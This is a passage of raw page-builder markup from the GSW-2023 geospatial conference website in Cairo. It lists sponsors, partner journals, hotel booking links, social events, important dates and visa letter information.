Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span>\r\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span>\r\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span>\r\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\r\n\r\n<h1 style=\"text-align: center;\">Journals partner</h1>\r\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\r\n\r\n<h3></h3>\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\r\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]\r\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]\r\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\r\n<span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" />\r\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\r\n\r\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\r\n<a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\r\n<a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a>\r\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\r\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\r\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span>\r\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span>\r\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span>\r\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\r\n\r\n<h1 style=\"text-align: center;\">Journals partner</h1>\r\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\r\n\r\n<h3></h3>\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\r\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]\r\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\r\n[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\r\n<h5></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\r\n<h4></h4>\r\n<img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" />\r\n\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]\r\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\r\n<h4></h4>\r\n<a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a>\r\n\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is September 1, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692140427657{margin-top: 50px !important;}\"]\r\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\r\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Crystal Cruising Restaurant</strong></h5>\r\n<img class=\"wp-image-5195 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d2-1-300x300.jpg\" alt=\"\" width=\"198\" height=\"198\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]\r\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\r\n<h5 style=\"text-align: center;\">Dinner and Show on The Citadel of Cairo</h5>\r\n<img class=\"wp-image-5196 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d1-1-300x201.jpg\" alt=\"\" width=\"300\" height=\"201\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<ul>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\r\n</li>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\r\n</li>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\r\n</li>\r\n</ul>\r\n[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<h2 style=\"text-align: center;\"></h2>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\r\n[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]\r\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\r\n[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" 